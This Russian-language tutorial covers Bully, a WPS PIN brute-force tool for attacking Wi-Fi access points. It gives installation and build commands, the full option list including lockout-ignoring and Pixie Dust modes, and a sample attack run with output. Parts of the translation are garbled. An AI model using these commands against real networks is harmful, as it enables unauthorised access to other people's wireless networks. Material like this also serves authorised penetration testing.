Codeby web-security - новый курс от Codeby Security School

Представляем вашему вниманию новый курс от команды The Codeby - "Тестирование Веб-Приложений на проникновение с нуля". Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...


Bully — это новое воплощение WPS атаки методом перебора паролей, расширенный и дополненный аналог Reaver. Программа написана на языке C и концептуально идентична другим программам в использовании ошибок проектирования спецификации WPS. По сравнению с оригинальным кодом аналогичных программ, данная программа имеет несколько преимуществ, таких как:

катагенез зависимостей;
улучшение памяти и времени работы центрального процессора;
правильная обработка порядка следования байтов и более функциональный набор опций.

Программа работает на Linux, и была специально создана для использования на встроенных системах Linux (OpenWrt, и т.д.) без привязки к архитектуре. Bully обеспечивает ряд усовершенствований в обнаружении и обработке аномальных сценариев. Она была успешно протестирована на точках доступа многих производителей, а также с различными конфигурациями.

У вас должна быть уже установлена программа Wiire’s Pixiewps. Последнюю версию можно найти здесь.

Технические требования

apt-get -y

вызовет установку дополнительных пакетов и библиотек build-essential libpcap-dev libssl-dev aircrack-ng pixiewp

Установка Bully

Скачайте

git clone https://github.com/aanarchyy/bully

или


Paranoid - курс от Codeby Security School

Представляем вашему вниманию курс от команды codeby - "Комплекс мер по защите персональных данных, анонимности в интернете и не только" Подробнее ...


wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip

Настройте

cd bully*/
cd src/
make

Установите

sudo make install

Использование bully

root@kali:~# bully -h

bully <options> интерфейс

  Необходимые параметры:

      Интерфейс      : Беспроводной интерфейс в режиме монитора (требуется root)

      -b, --bssid macaddr    : MAC адрес целевой точки доступа
   Or
      -e, --essid string     : Расширенный SSID для точки доступа

  Дополнительные параметры:

      -c, --channel N[,N...] : Номер канала AP, или список единиц измерения            [b/g]
      -i, --index N          : Начальный индекс пина (7 или 8 символов)               [Auto]
      -l, --lockwait N       : Секунд для ожидания если AP заблокирован WPS             [43]
      -o, --outfile file     : Файл для вывода сообщений                            [stdout]
      -p, --pin N            : Начальный номер пина (7 или 8 символов)                [Auto]
      -s, --source macaddr   : Исходный (железный) MAC адрес                         [Probe]
      -v, --verbosity N      : Уровень вербальности 1-4, 1 – самый тихий                 [3]
      -w, --workdir path     : Расположение файлов пина/сессии                   [~/.bully/]
      -5, --5ghz             : Список каналов по умолчанию для прыжков 5GHz a/n         [No]
      -B, --bruteforce       : Контрольная сумма пинов WPS для подбора пароля           [No]
      -F, --force            : Принудительно продолжать несмотря на предупреждения      [No]
      -S, --sequential       : Последовательные пины (не рандомизировать)               [No]
      -T, --test             : Режим тестирования (не вводить какие-либо пакеты)        [No]

  Продвинутые параметры:

      -d, --pixiewps         : Попытка использования pixiewps                           [No]
      -a, --acktime N        : Устаревшая/игнорируемая                                [Auto]
      -r, --retries N        : Повторная отправка пакетов N раз, когда нет подтверждения [2]
      -m, --m13time N        : Устаревшая/игнорируемая                                [Auto]
      -t, --timeout N        : Устаревшая/игнорируемая                                [Auto]
      -1, --pin1delay M,N    : Задержка M секунд каждое N не подтверждение в M5        [0,1]
      -2, --pin2delay M,N    : Задержка M секунд каждое N не подтверждение в M7        [5,1]
      -A, --noacks           : Отключить проверку ACK для отправляемых пакетов          [No]
      -C, --nocheck          : Пропустить валидацию CRC/FCS (производительность)        [No]
      -D, --detectlock       : Выявить WPS блокировки, о которых не сообщает AP         [No]
      -E, --eapfail          : EAP Failure после каждой отправки                        [No]
      -L, --lockignore       : Игнорировать WPS блокировки, о которых сообщает AP       [No]
      -M, --m57nack          : M5/M7 таймаут рассматриваемый как WSC_NACK's             [No]
      -N, --nofcs            : Пакеты не содержат поле FCS                            [Auto]
      -P, --probe            : Использовать запросы зондирования для AP                 [No]
      -R, --radiotap         : Предположительно, что заголовки radio tap присутствуют [Auto]
      -W, --windows7         : Делать вид, что регистрируется Windows 7                 [No]
      -Z, --suppress         : Подавлять алгоритм тротинга пакетов                      [No]
      -V, --version          : Напечатать версию и выйти
      -h, --help             : Напечатать эту справку

-d // —pixiewps

Опция -d выполняет автономную атаку, Pixie Dust (pixiewps), автоматически передавая PKE, PKR, E-Hash1, E-Hash2, E-Nonce и Authkey, pixiewps будет пытаться атаковать Ralink, Broadcom и Realtek чипсеты.

-v // — verbosity

Опция –v определяет вербальность bully. – v 4 печатает все собранные хэши и выводит команду запустить pixiewps. По умолчанию уровень запуска 3.

Пример использования Bully

Атака беспроводной сети ESSID (-е 6F36E6) с использованием интерфейса режима монитора (mon0) :

root@kali:~# bully -e 6F36E6 mon0
[!]   Bully v1.0-22 - оценка уязвимости WPS
[X]   Неизвестная частота '-113135872' сообщает интерфейсу 'mon0'
[!]   Использование '00:1f:33:f3:51:13' для источника MAC - адресов
[+]   Datalink тип установлен в '127 ', показывает заголовки
[+]   Опрашиваем '6F36E6' на канале 'неизвестно'
[+]   Получил ответ для '6F36E6' (9c:d3:6d:b8:ff:56)
[+]   Переключение интерфейса 'mon0' для канала '8'
[!]   Информационный элемент указывает, что WPS заблокирован
[!]   Создание нового рандомизированного pin - файла '/root/.bully/pins'
[+]   Индекс исходного pin '0000000'
[+]   Последний статус = 'NoAssoc'   Следующий pin '54744431'

При подготовке материала использована информация https://github.com/aanarchyy/bully и http://tools.kali.org/wireless-attacks/bully


Codeby Market от Сodeby

Мы запустили свой магазин CodebyMarket Equipment for InfoSec. Уже добавили RaspberryAlfa Long-RangeOrange PiArduino и многое другое. Купить Pentesting Devices